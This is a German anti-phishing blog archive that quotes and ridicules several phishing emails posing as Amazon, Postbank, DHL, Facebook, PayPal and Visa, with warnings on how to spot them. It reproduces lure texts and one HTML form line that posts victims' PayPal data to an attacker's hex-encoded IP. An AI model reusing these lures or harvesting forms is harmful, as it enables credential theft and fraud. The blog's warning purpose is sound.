Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.

Kategoriearchiv „Phishing“

Notice #4092803

Montag, 22. Februar 2010

Toller Betreff! Und das hier ist Blogeintrag Nummer 8207244137. Sehr informativ, nicht?!

Your Order S\n:6631816125008 Accepted.
Details

Krass. Ich hab bei denen bestellt, und das wurde akzeptiert. Die wissen zwar nicht, wie ich heiße und sprechen mich deshalb auch nicht mit einem Namen an, aber dafür hat meine Bestellung eine tolle, lange Nummer. Genau so würde jemand vorgehen, der seine Kunden vertreiben möchte, und deshalb würde niemand so vorgehen, der wirklich ein Geschäft im Internet machen will.

Aber das will der Phisher ja nicht. Er will nur ein paar Daten von Dummköpfen haben, die glauben…

Thank you,
Amazon.com Customer Support

…dass eine solche Mail von Amazon käme. (Ich bin dort nicht einmal Kunde.) Diese Dummköpfe merken dann auch gar nicht, dass der klickige Link mit dem tollen Text „Details“ gar nicht zu Amazon geht, sondern zum Server polygon1 (punkt) effect (punkt) effect (punkt) kiev (punkt) ua, der mit Amazon ungefähr so viel zu tun hat wie der Mond mit dem Prozessor meines Computers. Dafür gibt es dort ein Dokument open (punkt) html, das fast so aussieht wie die Anmeldung bei Amazon, und da kann das Opfer dann – wenn er nicht vorher einen Blick auf die Adresszeile seines Browsers geworfen hat und davon angemessen skeptisch geworden ist – fröhlich seine Anmeldedaten angeben. Die Betrüger werden das schon für betrügerische Bestellungen zu nutzen wissen, denn genau dafür sammeln sie solche Daten ein. Und den finanziellen Schaden hat das gutgläubige Opfer.

LASST EUCH NICHT PHISHEN! Wer auf Kundenbeziehungen Wert legt und im Internet geschäftlich tätig ist, wird seine Kunden immer mit ihrem Namen und in einem freundlichen, nicht technokratisch wirkenden Tonfall ansprechen – egal, ob Bankhaus, Händler oder Auktionsplattform. In letzter Zeit sehe ich wieder vermehrt Mails mit Phishing-Versuchen, die sich in den vorherigen Monaten doch sehr rar gemacht haben. Besonders von diesen Versuchen betroffen sind eBay, PayPal, Amazon – dort lässt sich auch am leichtesten Geld aus gephishten Anmeldedaten machen. Diese Betrugsmasche ist also wieder aktuell. Auf keinem Fall sollte man bei einer solchen Mail auf die Idee kommen, auf den Link zu klicken – immer die Adresse von Amazon, eines sonstigen Händlers, einer Bank oder vergleichbaren Geschäftsplattformen von Hand eingeben! Und wenn man in einer solchen Mail nicht namentlich angesprochen wird, weg damit! Es ist immer eine betrügerische Spam, mit der Anmeldedaten abgegriffen werden sollen, damit die Betrüger diese benutzen können.

PostBank Online Registrierung bestдtigen

Donnerstag, 18. Februar 2010

Ach, und dann ist da noch der inkompetente Phisher des Tages, der mal wieder nicht gerafft hat, dass die deutschen Umlaute bei Angabe der Codepage für russische Sprache halt ein bisschen anders aussehen. Wie unnütz, wenn man seine Drecksmail eh schon in HTML formatiert, da könnte man auch die entsprechenden Entitäten schreiben. Aber dafür müsste der bröselhirnige Spamdepp mit dem gefälschten Absender service (at) online (punkt) de und dem toll gewählten Namen Postbank ja einen Funken technisches Verständnis haben.

Ob die Masche wohl auch so funktionieren wird… :mrgreen:

Guten Tag ,

Unternehmen wie die Postbank haben es natürlich nicht nötig, ihre Kunden namentlich anzusprechen. Die haben gar kein Interesse an irgendeiner Kundenbindung… :mrgreen:

vielen Dank fьr Ihre Registrierung.

Bitte bestдtigen Sie diesen Link, um Ihre Registrierung abzuschlieЯen.

Jetzt Registrierung bestдtigen

Ich habe Links bislang immer nur angeklickt oder im Browser geöffnet. Wie man einen Link „bestätigt“, ist mir recht neu. 😆

Der Link geht natürlich nicht zur Website der Postbank, sondern zu einer von Kriminellen benutzten Website. Er geht zu www (punkt) leadershipbrandon (punkt) com (slash) ext (slash) Postbank.html. Dort kann man dann bestimmt seine Anmeldedaten für die Website der Postbank angeben, und die Leute, denen man da seine Daten gibt, werden schon etwas damit anfangen. Allerdings nichts, was sich ein Postbank-Kunde wünschen könnte.

Wir freuen uns, dass Sie auch am E-Mail-Service teilnehmen wollen und ьber attraktive Angebote und Aktionen der Postbank und des Online-Empfehlungsprogramms per E-Mail informiert werden wollen.

Jaja, die Freude ist ganz auf meiner Seite. Schickt mir mehr von diesen hingepatzten Realsatiren, das bringt ein Sönnchen Humor in den normalen Spamalltag.

Viele GrьЯe

Ihre Postbank
Jetzt eine Prдmie von 25 € sichern

Hey, du kannst das ja doch mit den Entitäten! Das Euro-Zeichen codierst du als €. Warum machst du das mit den Umlauten nicht einfach genauso?

Ach, weil du deine Fragmente einfach aus anderen Mails zusammenkleisterst und dir gar nicht erst anschaust, wie das Endergebnis aussieht? Sehen ja schließlich die paar Millionen Empfänger, und das reicht? Na, genau so inkompetent hingerotzt wirkt es dann eben auch.

Geh sterben, du unfähiger Phisher! 👿

Phishing: DHL-Packstation

Samstag, 2. Januar 2010

Bei mir ist diese kriminelle Spam vom angeblichen DHL-Kundendienst noch nicht angekommen, aber sie scheint recht gefährlich zu sein:

Zurzeit sind Spam-Mails in Umlauf, die vorgeblich vom DHL-Kundenservice stammen und den Empfänger auffordern, seinen Packstations-Account dauerhaft zu registrieren. Die dort angegebene Webseite sieht auf den ersten Blick wie eine echte Seite von DHL aus […]

Weiterlesen bei heise online…

Der Text der Mail wirkt auf mich wenig überzeugend, aber da sich viele Menschen wegen ihrer geringen technischen Kompetenz durch technokratische Sprache beeindrucken lassen, könnte die betrügerische Masche doch sehr gefährlich sein.

Sehr geehrter PACKSTATION-Kunde,
sehr geehrte PACKSTATION-Kundin,

aufgrund der großen Nachfrage des PACKSTATION-Systems sind wir gezwungen dauerhaft inaktive Accounts für neue Kunden freizugeben. Selbstverständlich können Sie auf Wunsch weiterhin Ihre PACKSTATION nutzen. Hierfür ist lediglich ein Login unter
http://www.kundenservice-dhl.de/
nötig, um Ihren Account automatisch dauerhaft zu registrieren.

Generell lässt sich feststellen, dass hier alle Kennzeichen des Phishing sichtbar sind:

  1. Es fehlt jegliche persönliche Ansprache, obwohl der Empfänger doch „Kunde“ sein soll. Allein dieses Detail ist ein Grund, den Inhalt einer Mail mit der größtmöglichen Skepsis zu lesen.
  2. Der technische Grund für die Mail ist unsinnig. Eine Datenbank mit Kundendaten wird nicht so voll, dass „inaktive Accounts“ neu verwendet werden müssten. Es wäre auch unter Gesichtspunkten der Datensicherheit schlicht irrsinnig, in dieser Weise vorzugehen, einmal ganz davon abgesehen, welchen Albtraum ein solcher Vorgang für die Grundsätze ordnungsgemäßer Buchführung bedeutet. Typischerweise wird der Kunde technisch über eine (aus Kundensicht unsichtbare) nummerische ID identifiziert, die meist im Bereich bis zu ca. 4 Milliarden liegen kann. Es ist schon recht unwahrscheinlich, dass die deutschen Packstationen derart beliebt sind, dass ein solcher Nummernkreis nicht ausreichen sollte. Wenn dies aber dennoch der Fall sein sollte, wäre es für den Administrator der Datenbank eine Kleinigkeit, diesen Zahlenbereich zu erweitern, ohne dass aus Kundensicht eine Aktion erforderlich wäre oder auch nur eine Änderung bemerkt werden würde.
  3. Das „dauerhafte“ Registrieren eines registrierten Accounts ist hanebüchen. Der Account ist registriert. Er wird auch nicht gelöscht werden, da die Geschäftsvorgänge, die mit diesem Account verbunden sind, nach den Grundsätzen der ordnungsgemäßen Buchführung nachvollziehbar bleiben müssen.
  4. Der kalte, technokratische Ton der Mail ist entlarvend. Kein Unternehmen würde seine Kunden so ansprechen und auf jede Hintergrundinformation zu einem derartigen Vorgang – sollte er jemals erforderlich sein – verzichten.
  5. Für den „Login“ wird kein HTTPS verwendet, die Anmeldedaten sollen unverschlüsselt über das Internet übermittelt werden. Kein größeres Unternehmen würde seinen Kunden ein derartiges Sicherheitsrisiko aufbürden. Ob HTTPS verwendet wird oder nicht, lässt sich an der verwendeten Internetadresse erkennen, diese muss mit https:// beginnen, wenn es sich um eine gesicherte, verschlüsselte Verbindung handelt. Nähere Informationen können in der Dokumentation des Browsers und an vielen Stellen im Internet nachgelesen werden.

Es reicht also tatsächlich schon ein kurzes Nachdenken, um zu erkennen, was es mit dieser kriminellen Mail auf sich hat. Das gleiche gilt für jeden anderen Versuch des Phishings. Wenn in einer unpersönlich formulierten Mail zum Login auf irgendeiner Website einer Bank, eines Unternehmens oder eines sonstigen Webdienstes aufgefordert wird, der Geschäfte mit Geld oder geldwerten Gütern ermöglicht, sollte Alarmstufe Rot herrschen und in aller Ruhe und Besonnenheit gelesen werden. Niemals sollte man sich von der Absenderadresse einer Mail verblenden lassen, diese ist beliebig fälschbar. Niemals sollte man sich von einer plausibel klingenden Internet-Adresse für eine solche Anmeldung täuschen lassen, denn jeder kann sich eine Domain registrieren.

Im Zweifelsfall einfach erstmal nichts tun! Keine Chance den kriminellen, mafiös organisierten Phishern. In diesem speziellen Fall ist auch das Erstatten einer Strafanzeige wegen Betruges in Erwägung zu ziehen, da der Registrar der verwendeten Domain ermittelbar ist und es möglich ist, dass die Verbrecher bei ihrem Werk eventuell genug Spuren hinterlassen haben, um dingfest gemacht werden zu können. Das Erstatten einer Strafanzeige ist sehr einfach und lässt sich gut mit einem kleinen Spaziergang zur nächsten Polizeiwache kombinieren. Und wer auf dieses Phishing hereingefallen ist, sollte gleich jetzt sein Passwort ändern, bevor ein Schaden entsteht.

Auch 2010 gilt: Keine Chance den Phishern!

new login system

Dienstag, 22. Dezember 2009

Die folgende Mail…

Dear Facebook user, In an effort to make your online experience safer and more enjoyable, Facebook will be implementing a new login system that will affect all Facebook users. These changes will offer new features and increased account security. Before you are able to use the new login system, you will be required to update your account. Click here to update your account online now. If you have any questions, reference our New User Guide. Thanks, The Facebook Team

…kommt nicht von Facebook. Der Link, mit dem man seinen Account bei Facebook updaten kann, führt dafür auch nicht zu Facebook, sondern zu einer Internet-Adresse in einer chinesisches Domain, die mit etlichen Subdomains daher kommt – und natürlich beginnen diese mit www (punkt) facebook (punkt) com, damit man einen Grund mehr hat, die dort präsentierte Möglichkeit, Username und Passwort an die Spamverbrecher zu geben, für ein Angebot von Facebook zu halten.

Wer sich da einloggt, hat seinen Zugang zu Facebook den Spammern geschenkt. Die werden gewiss etwas damit anfangen können. Und das wird den wenigsten Opfern dieses Phishings gefallen.

Deshalb: Sondermüll löschen!

Es ist übrigens sicher, dass Facebook in Mails eine bessere und persönlichere Anrede verwenden würde als dieses „Dear Facebook User“. Aber die Spammer können natürlich niht wissen, wie die Millionen von anonymen Empfängern heißen und ob sie überhaupt Facebook benutzen. Ich zum Beispiel benutze es nicht und werde auch nicht damit anfangen.

Did you get yours?

Donnerstag, 19. November 2009

Was soll ich gekriegt haben?

It has hit the net by storm. The most advanced and effective formula to date!

Der einzige Sturm im Netz, den ich erlebe, ist der Sturm in meinem Mailserver.

Now it can be yours for F r/e*e..thats right, just tell us where to ship yours to get started.

Ja, was ist es denn? Erzähl du mir doch erstmal, was ich da bekommen soll!

Claim your TrialSupply at www.boxgras.com

Na gut, denn eben nicht.

Es geht übrigens vorgeblich um Pimmelpillen und in Wirklichkeit um eine anständige Sammlung von Kreditkartendaten für die Spammafia, damit die besser ihr Betrugsgeschäft durchziehen können. Es ist vollkommen egal, welche…

Die Website der Spammer

…Anschrift man auf der Website der Spammer dort rechts unter „Free Trial“ angibt (man kann es auch einfach leer lassen), es geht immer auf eine zweite Seite, wo man seine „Bestellung“ absenden kann, allerdings nicht ohne…

Daten her, du Schwanz!

…vorher noch einmal seine Kreditkartendaten abgelegt zu haben. Frei nach dem Motto: Brauchst du einen längern Schwanz, entblöß dich vor Verbrechern ganz!

Wer einem Spammer seine Mailadresse in so einem Formular gibt, der ist ja schon so dumm, dass ich kaum noch helfen kann. Wer ihm dann auch noch so etwas wie einen Blankoscheck für das eigene Konto ausstellt, na ja, der hat es nicht besser verdient, wenn er so richtig abgezogen wird. Wird der Pimmel groß und steif, fehlt bei manchem wohl das Blut im Hirne.

Aber ein wirklich guter Lacher war der Hinweis, dass es sich beim Abgeben dieser Daten an Kriminelle um eine „secure transaction“ handeln soll – die nehmen nicht einmal HTTPS für ihren Betrug. Da kann mich auch nicht das reingepflasterte Logo von McAfee überzeugen.

Was auf dem ersten Blick wie eine Pimmelpillen-Spam aussah, war also in Wirklichkeit einfach nur Phishing, und zwar in einer recht originellen und unverbrauchten Weise, die wohl auch ihre Opfer finden wird. Mal schauen, wann es diese Masche auch in deutscher Sprache gibt.

PayPal .INC

Mittwoch, 11. November 2009

Das ist ja ein gnadenlos doofer Betreff! Gehts noch?!

To make sure everything is in order, please download the PayPal Security Account Verification and fill in all the required data for verfication.

Und dazu gibt es eine gnadenlos doofe Nachricht. Ohne Anrede, ohne Gruß, ohne alles, was auch nur entfernt nach glaubwürdiger Kommunikation von PayPal aussieht – stattdessen mit der Aufforderung, sich eine Kontobestätigung zur Sicherheit „runterzuladen“. Nun, dass dazu kein Link steht, ist gut verständlich, denn da ist noch etwas an die Mail angehängt. Dieser Spammer ist mit seinem Phishing-Versuch so brettmorsch hirnfraßmäßig doof, dass er nicht einmal den Unterschied zwischen einem Anhang und einem Link zum Download kennt. Leider hält ihn das nicht davon ab, ein paar Millionen Drecksspams durch das Netz zu bewegen.

Ach ja, das angehängte Dokument ist eine HTML-Datei mit dem schönen Namen PayPal Security Account Verification.html. Wer darauf klickt (so etwas macht man nur mit einem besonders gesicherten System), darf sich über den folgenden Anblick freuen:

Screenshot des dummen Anhanges für das Phishing

[Wer sich darüber wundert: Die Titelgrafik wird aus dem Internet von PayPal nachgeladen, aber der System, mit dem ich solche Drecksdateien betrachte, hat keine Verbindung zum Internet. Deshalb fehlt die Grafik im Titelbereich.]

Aber es glaube bitte niemand, dass die eventuell dort eingegebenen Daten zu PayPal gehen, nein, sie gehen [es folgt ein Quelltextausschnitt]…

<FORM METHOD="POST" ACTION="http://0xD5.0xC3.0xDF.0xA9/paypalverification.php/" name="Form_1">

…an ein Skript auf einen Rechner mit der IP-Adresse 213.195.223.169; und der Spammer will diesen Fakt recht fragwürdig hinter einer eher unüblichen sedezimalen Schreibweise verbergen. Im Gegensatz zu PayPal hält dieser stümpernde Verbrecher auch nichts von einer sicheren Verbindung über HTTPS.

Oder anders gesagt: Wer in einer Mail „von PayPal“ einen Anhang „zum Ausfüllen“ findet, sollte sich bitte hüten, wenn er nicht eine Verbrecherbande reich machen will.

Und ja, wenn PayPal wirklich einmal schreibt, denn immer mit einer persönlichen Anrede, aber dafür ohne…

We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address and we have reasons to believe that your account was hijacked by a third party without your authorization. If you recently accessed your account while traveling, the unusual log in attempts may have been initiated by you.

…irgendwelche hingeschmierten Schwammigkeiten, die nichts belastbares aussagen, aber damit ordentlich Alarmstimmung beim Empfänger auslösen sollen.

Ihre Kreditkarte wird ausgesetzt.

Donnerstag, 5. November 2009

Ah, mal wieder ein Betreff mit einem Punkt am Ende…

Verifedbyvisa Verifedbyvisa

Und sowas von „verified“, das muss ja geradezu echt sein. Schade nur, dass man bei „Visa“ nicht zu wissen scheint, wie sich „verified“ schreibt… :mrgreen:

Hallo Gast Visa Card,

Das nenne ich eine originelle Anrede. Hallo Gast Visa Card. Was bin ich denn nun? Bin ich ein Gast? Habe ich einige Exemplare eines Gast-Visums (Plural: Visa)? Oder Karten davon? Oder vielleicht Eintrittskarten? Der anonym bleibende Autor stößt mir nur vier Wörtern eine Lawine möglicher Assoziationen los, die jede Beschränkung der Phantasie mit sich hinfortreißt… :mrgreen:

Ihre Kreditkarte wird ausgesetzt, weil wir ein Problem Hinweis auf Ihrer Karte.

Und das reicht dem unbekannten Dichter dieser Spam nicht, denn er fühlt sich so frei, die zukünftige Entwicklung der deutschen Sprache vorweg zu nehmen. Er befreit die Sprache aus dem Korsett der Partikeln und Verben, setzt sie für einen unmittelbaren, deutlichen und drangvollen Ausdruck neu zusammen, der in seiner Eindringlichkeit wie ein brennendes Haus klingt: „weil wir ein Problem Hinweis auf Ihrer Karte“. Jeder versteht, was gemeint ist und dass es wirklich eilt.

Wir feststellen, dass jemand Ihre Karte ohne Ihre Erlaubnis verwenden dьrfen. Zu Ihrem Schutz haben wir daher Ihre Kreditkarte ausgesetzt. Zur Aufhebung der Aussetzung, Klicken Sie hier und folgen Sie den Anweisungen geben, Ihre Kreditkarte zu aktualisieren.

Leider kann der „Wir“-Erzähler dieses hohe Niveau nicht halten, so sehr auch darum bemüht ist. Der Link auf „Klicken Sie hier“ geht auf eine unter madciine (dot) com gehostete Seite von Betrügern, die vielleicht eine gewisse optische Ähnlichkeit mit den Originalseiten von Visa haben mag, aber durch einen einfachen Blick in die Adressleiste zeigt, dass hier bei einer „Anmeldung“ Daten an irgendwelche Verbrecher gegeben werden. Na ja, der Text der Mail zeigt seinen Charakter ja auch durch bloßes Hinschauen.

Hinweis: Wenn diese nicht vollstдndig November 6, 2009, werden wir gezwungen sein, Ihre Karte immer auszusetzen, denn es kann verwendet werden fur betrugerische

[Ja, das hört im Original genau so auf!]

Und jetzt noch ein bisschen hetzen, denn Eile macht dumm – jeder Haustürverkäufer und jeder Betrüger weiß das.

Wir bedanken uns fur Ihre Zusammenarbeit in dieser Angelegenheit.

Danke,
Kunden-Support-Service.

Aber bitte doch. Wenn ihr mir diesen Strunz in 27 Ausführungen schickt, denn bettelt ihr ja geradezu darum, dass ich euch einmal erwähne.

Copyright 1999-2009 VerifedbyVisa. Alle Rechte vorbehalten.

Verklag mich doch, Spammer!

Phishing: Lieb PayPal Customer

Freitag, 16. Oktober 2009

Das hatten wir heute schon einmal, wenn auch mit weniger peinlichem Betreff.

Warnung Notification

Klar doch, so etwas kommt immer in der falschen Sprache und ohne persönliche Anrede, denn PayPal hat kein Interesse an irgendeiner Kundenpflege. Allein das ist ein deutliches Indiz, dass man es mit einer Mail von Betrügern zu tun hat. Hier kann man es noch an gewissen anderen – ähm – Schwächen bemerken, aber so massiv, wie gerade die Phishing-Spams hier reinkommen, wird der Text wohl morgen schon ausgereift sein. Dass jemand auf dieses Geschreibsel reinfällt, erscheint mir ja schon unglaublich:

Lieb PayPal Costumer,

Es ist uns nicht entgangen, dass dein PayPal® account-Informationen muss im Rahmen der Aktualisierung unserer anhaltendes Engagement fьr Ihr Konto zu schьtzen und zu reduzieren der Fall von Betrug auf unserer Website. Wenn Sie kцnnten Bitte nehmen Sie sich 5-10 Sie wird nicht ausgefьhrt, in Zukunft keine Probleme mit der Online – Dienst.

Jedoch nicht aktualisiert Ihre Eintrдge werden auf dem Konto Ergebnis Suspension. Bitte aktualisieren Ihre Eintrдge vor Oktober 08, 2009.

Sobald Sie aktualisiert haben Ihre Konto werden Ihre PayPal® Kontobewegungen nicht unterbrochen werden und wird wie gewohnt weiter.

Klicken Sie auf Hier aktualisieren Sie Ihr PayPal-Konto Informationen

Der Link geht mal wieder auf ein gehacktes Forum. Und für jene, die ganz neugierig sind, zeige ich jetzt mal, wie es aussieht, wenn man da draufklickt – mit einem besser formulierten Text könnte ein erheblicher Teil der naiveren PayPal-Kunden auf den fiesen Betrug dieser Phisher reinfallen.

Der Klick führt auf eine HTML-Datei, die bei einem gehackten Forum über eine Sicherheitslücke hinterlegt wurde. Diese Seite selbst enthält nur eine Weiterleitung auf clan punkt barabaka punkt biz / ts / webscr.php mit den GET-Parametern cmd = _login-run und dispatch mit einer endlos langen, base64-codierten Kennung, über welche die Spammer wahrscheinlich feststellen, dass ihr durch einen Hack hochgeladener Code noch aktiv ist und weiter mit Spam beworben werden kann.

Die hier für den Betrug verwendete Domain ist bei Manager Peterhost, ul Professora Popova 37B, St. Petersburg gehostet, als Registrar ist ein Sergey Khomenko ohne Anschrift aus der schönen großen Stadt Moskau eingetragen. Letzteres dürfte ein reiner Phantasiename sein. Der Hoster ist schon von mir angemailt worden, aber nach meinen bisherigen Erfahrungen mit russischen Hostern verspreche ich mir davon nichts, nicht einmal eine Eingangsbestätigung. Allerdings gehe ich davon aus, dass auch der Hoster ein Betrogener ist. Auch der Betreiber des gehackten Forums hat schon seine Mail und wird wahrscheinlich ein großes Eigeninteresse daran haben, dass dieser Müll von seinem Server verschwindet – aber auf dieser Seite ist das alles ein Kampf gegen Windmühlen, wahrscheinlich werden zurzeit tausende von gehackten Websites von diesen Verbrechern missbraucht.

Mal so am Rande gefragt: Wo ist eigentlich der Kampf gegen die Internet-Kriminalität? Ich bin überzeugt, dass ein Tätigwerden des BKA deutlich mehr Wirkung beim Hoster entfalten würde als die Mail eines Namenlosen ohne Wohnsitz aus dem fernen fernen Deutschland – vor allem, wenn dabei mit russischen Behörden zusammengearbeitet würde. Aber von einem „sicheren Internet“ redet man ja nur im Wahlkampf und wenn man den Menschen Zensur und andere Einschränkungen verkaufen will. Die wirkliche Kriminalität scheint allen Beteiligten gleichgültig zu sein, und deshalb werden immer wieder arglose Menschen um tausende von Euros abgezockt.

[Für Originalgröße der folgenden Screenshots die Vorschaubilder anklicken]

Login-Bildschirm der Phisher

Wenn der gläubige PayPal-Kunde diesen Bildschirm sieht, kann ich nur hoffen, dass er auch auf die Adresszeile seines Browsers schaut und misstrauisch wird. Denn darin erscheint nicht die vertraute Domain paypal.com, sondern die Domain eines Betrügers. Es würde mich nicht wundern, wenn in kommenden Versionen des Betruges versucht würde, die Adresszeile des Browsers auszublenden.

WICHTIGER HINWEIS: Solche Internetadressen wie die einer Bank, eines Auktionshauses oder eines Dienstes zur Online-Bezahlung gibt man immer von Hand ein. Niemals auf einen Link in einer E-Mail klicken. Niemals auf die Lesezeichen (für IE-Freunde: Favoriten) des Browsers verlassen, diese sind für Kriminelle manipulierbar. Niemals mit administrativen Berechtigungen im Internet surfen, damit nicht unter Ausnutzung von Sicherheitslücken die Zuordnung der Domainnamen zu IP-Adressen manipuliert werden kann. Selbst mit solchen Vorkehrungen ist kein Computer unter keinem Betriebssystem völlig sicher, es gilt, unter allen Umständen aufmerksam zu bleiben. Keine Sicherheitssoftware kann bewusste Vorsicht und Aufmerksamkeit ersetzen.

Wenn ein argloser Anwender hier seine Mailadresse und sein PayPal-Passwort eingegeben hat (ich habe hier ein paar mit Schimpfwörtern gesalzene Phantasiedaten genommen, um den Datenbestand der Kriminellen ein wenig zu verseuchen), geht es nicht gleich weiter, sondern es wird eine Fehlermeldung angezeigt, dass man sich mit falschen Daten angemeldet hat:

Fehlermeldung, damit man auch wirklich die richtigen Daten eingibt

Erst, wenn man zwei Mal nacheinander die gleiche Eingabe gemacht hat, geht es weiter. Diese Verbrecher wollen als einen ganz sauberen Datenbestand haben und sich nicht weiter mit Tippfehlern herumschlagen, wenn sie die Bankkonten anderer Leute für ihre betrügerischen Geschäfte plündern. Die wollen so wenig zeitlichen Aufwand wie nur irgend möglich dafür betreiben, dass sie ihre Betrugsgeschäfte durchziehen.

Nach dem Einsammeln der PayPal-Anmeldedaten haben diese Bastarde schon einen großen Schritt gemacht und könnten eigentlich unter irgendeinem Vorwand abbrechen – ein komplettes PayPal-Konto stünde ihnen bereits zur Verfügung. Aber die werden auch daran nicht satt und treiben es noch ein bisschen bunter, denn nach erfolgreicher Anmeldung…

Ein totaler Datenstriptease vor einer Bande von Verbrechern mit großer krimineller Energie - das kann man niemandem empfehlen

…erhält man nicht etwa die gewohnte Kontenübersicht (obwohl genau das noch in der Überschrift steht), sondern ein Formular für „Bestatigen Mein Konto.“ (in genau dieser Schreibweise). Wenn man diese Eingabemaske sieht, ist es eigentlich schon zu spät, aber der Schaden lässt sich jetzt noch beliebig verschlimmern. In diesem tollen Formular kann man nämlich einen kompletten Datensatz über sich selbst an die hochkriminellen Spammer geben, einschließlich Anschrift und Geburtsdatum und Nummer des Ausweises (Numero von CIN ist aber nicht gerade deutsch). Das sind Daten, über die sich jeder Kriminelle freut, wenn er seine ganz besonderen „Geschäfte“ machen will.

Also bitte niemals niemals niemals auf ein Phishing reinfallen.

In jeder echten Mail der Bank, von PayPal oder jedem anderen Unternehmen, bei dem man Kunde ist, wird man persönlich angesprochen – und es wird hoffentlich auch überall darauf hingewiesen, dass man die Internetadresse von Hand eingeben soll. Und selbst, wenn eine Mail mit persönlicher Ansprache kommt, sollte man skeptisch bleiben, denn die Verbrecher kommen immer wieder einmal an persönliche Daten – im Zweifelsfall zum guten, alten Telefon greifen und einfach einmal nachfragen. Dieses bisschen Vorsicht kann sehr viel Geld sparen.

Close

⚠️ Kein Adblocker erkannt 🛑

Bitte installieren Sie so schnell wie möglich einen Adblocker für ihren Webbrowser! Sie schützen damit die Ihren Computer vor Schadsoftware, die über Malvertising verteilt wird, und Sie schützen sich selbst vor Ausspähung und intransparentem Datenhandel durch halbseiden bis grenzkriminell vorgehende Wirtschaftsunternehmen. Das ist Grund genug, einen Adblocker zu verwenden. Aber gleichzeitig machen Sie auch Ihre gesamte Interneterfahrung schöner, erfreulicher und schneller. Ich empfehle uBlock Origin.